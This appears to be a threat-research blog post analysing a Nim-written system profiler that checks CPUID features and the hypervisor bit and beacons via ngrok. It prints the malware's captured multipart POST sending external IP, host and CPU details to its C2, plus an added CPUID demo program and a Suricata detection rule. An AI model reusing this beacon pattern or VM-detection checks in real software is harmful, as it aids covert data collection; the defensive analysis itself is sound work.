By: Jason Reaves
Recently, while working on Metastealer samples, we pivoted and ended up discovering a new piece of malware written in Nim. The sample appears to be a system profiler, but it also leverages ngrok for its C2.
One of the first things this sample does happens inside PreMainInner, during the initialization portion of the executable: a very extensive function that retrieves the name of the CPU.
The values passed to the CPUID call are the leaves 0x80000002–0x80000004, which return the processor brand string (16 bytes per leaf across EAX, EBX, ECX and EDX, 48 bytes in total).
Recovering the brand string isn't a new technique for malware, but this sample goes further and enumerates a significant number of processor features, including the extended processor information returned by CPUID leaf 0x80000001. The first check, however, is the hypervisor-present bit (CPUID leaf 1, ECX bit 31), which tells the code whether it is running under a hypervisor.
Next comes a large number of checks against the processor feature bits.
The full list of features checked can be found below:
Most of the features checked result in a flag being set inside the malware; in the sample analyzed, however, these flags are not actually used anywhere yet.
In the main portion of the malware, it first contacts the icanhazip service to retrieve its external IP address.
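As an added example (not code from the sample or from the original write-up), the following C program performs the same three CPUID queries the profiler makes on an x86 host: it assembles the brand string from leaves 0x80000002 to 0x80000004, reads the hypervisor-present bit from leaf 1, and decodes a handful of the extended feature bits from leaf 0x80000001. The feature table is a small subset chosen for illustration, not the sample's list, and the register values in example_brand_string() are constructed so the decoder can be exercised without real hardware.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#define HAVE_CPUID 1
#else
#define HAVE_CPUID 0
#endif

struct cpuid_regs { uint32_t eax, ebx, ecx, edx; };

/* Execute CPUID for one leaf. Returns false if the leaf is above the
 * maximum the CPU reports, or when built for a non-x86 target. */
static bool cpuid_query(uint32_t leaf, struct cpuid_regs *r) {
#if HAVE_CPUID
    unsigned int a = 0, b = 0, c = 0, d = 0;
    if (!__get_cpuid(leaf, &a, &b, &c, &d)) return false;
    r->eax = a; r->ebx = b; r->ecx = c; r->edx = d;
    return true;
#else
    (void)leaf; (void)r;
    return false;
#endif
}

/* Leaves 0x80000002-0x80000004 each return 16 characters of the brand
 * string in EAX, EBX, ECX, EDX (lowest byte first). Assemble all 48 into
 * a NUL-terminated buffer; out must hold at least 49 bytes. */
static void brand_from_regs(const struct cpuid_regs regs[3], char *out) {
    size_t off = 0;
    for (int i = 0; i < 3; i++) {
        const uint32_t words[4] = { regs[i].eax, regs[i].ebx, regs[i].ecx, regs[i].edx };
        for (int j = 0; j < 4; j++)
            for (int k = 0; k < 4; k++)          /* explicit little-endian unpack */
                out[off++] = (char)((words[j] >> (8 * k)) & 0xff);
    }
    out[48] = '\0';
}

/* CPUID.1:ECX[31] is the "hypervisor present" bit: set inside a VM, clear on bare metal. */
static bool hypervisor_bit_set(uint32_t leaf1_ecx) { return ((leaf1_ecx >> 31) & 1u) != 0; }

/* A few of the extended feature bits reported by leaf 0x80000001 (Intel SDM / AMD APM). */
struct feature_bit { const char *name; bool in_edx; int bit; };
static const struct feature_bit EXT_FEATURES[] = {
    { "LAHF/SAHF", false, 0 }, { "LZCNT", false, 5 },  { "PREFETCHW", false, 8 },
    { "SYSCALL",   true, 11 }, { "NX",    true, 20 },  { "Page1GB",   true, 26 },
    { "RDTSCP",    true, 27 }, { "LM",    true, 29 },
};
#define N_EXT (sizeof EXT_FEATURES / sizeof EXT_FEATURES[0])

/* Fill names[] with the set features (up to max entries) and return how many are set. */
static size_t decode_ext_features(uint32_t ecx, uint32_t edx, const char **names, size_t max) {
    size_t n = 0;
    for (size_t i = 0; i < N_EXT; i++) {
        uint32_t reg = EXT_FEATURES[i].in_edx ? edx : ecx;
        if ((reg >> EXT_FEATURES[i].bit) & 1u) {
            if (n < max) names[n] = EXT_FEATURES[i].name;
            n++;
        }
    }
    return n;
}

/* Constructed register values (not captured from the sample) that decode to the brand
 * string seen in the sample's POST, so the decoder can be checked offline. */
static const char *example_brand_string(void) {
    static char buf[49];
    const struct cpuid_regs regs[3] = {
        { 0x65746e49, 0x2952286c, 0x6f655820, 0x2952286e },  /* "Intel(R) Xeon(R)" */
        { 0x55504320, 0x32204020, 0x4730382e, 0x00007a48 },  /* " CPU @ 2.80GHz"   */
        { 0, 0, 0, 0 },
    };
    brand_from_regs(regs, buf);
    return buf;
}

int main(void) {
    struct cpuid_regs r[3], l1, ext;
    char brand[49];
    if (cpuid_query(0x80000002, &r[0]) && cpuid_query(0x80000003, &r[1]) &&
        cpuid_query(0x80000004, &r[2])) {
        brand_from_regs(r, brand);
        printf("CPU Name: %s\n", brand);
    }
    if (cpuid_query(1, &l1))
        printf("Hypervisor bit: %s\n", hypervisor_bit_set(l1.ecx) ? "set" : "clear");
    if (cpuid_query(0x80000001, &ext)) {
        const char *names[N_EXT];
        size_t n = decode_ext_features(ext.ecx, ext.edx, names, N_EXT);
        for (size_t i = 0; i < n; i++) printf("ext feature: %s\n", names[i]);
    }
    return 0;
}
```

Run it once inside a VM and once on bare metal and compare the hypervisor line: that single bit is what the sample consults first, and it is also the cheapest evasion check to defeat, since a VM configuration can mask it (for example `-cpu host,-hypervisor` under QEMU/KVM).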
After collecting this data, the malware sends the bot's external IP address, host information and CPU information to the hardcoded C2 server in a multipart POST:

POST /sysvndump/send HTTP/1.1
content-type: multipart/form-data; boundary=4292486321577947087
user-agent: Nim httpclient/1.6.2

--4292486321577947087
Content-Disposition: form-data; name="dump_text"

ICANHAZIP response: 220.127.116.11
\nHost OS: windows\nHost CPU: amd64\nCPU Name: Intel(R) Xeon(R) CPU @ 2.80GHz
--4292486321577947087--

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 19:20:11 GMT
The hardcoded data recovered during reversing leaves plenty of options for a network signature.
I homed in mostly on the generic portion of the Nim user-agent, the Content-Disposition value and the icanhazip response string:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"NIM Profiler"; content:"Nim httpclient"; http_user_agent; content:"form-data|3b| name=|22|dump_text|22|"; http_client_body; content:"ICANHAZIP response"; http_client_body; sid:9000234; rev:1; metadata:author Jason Reaves;)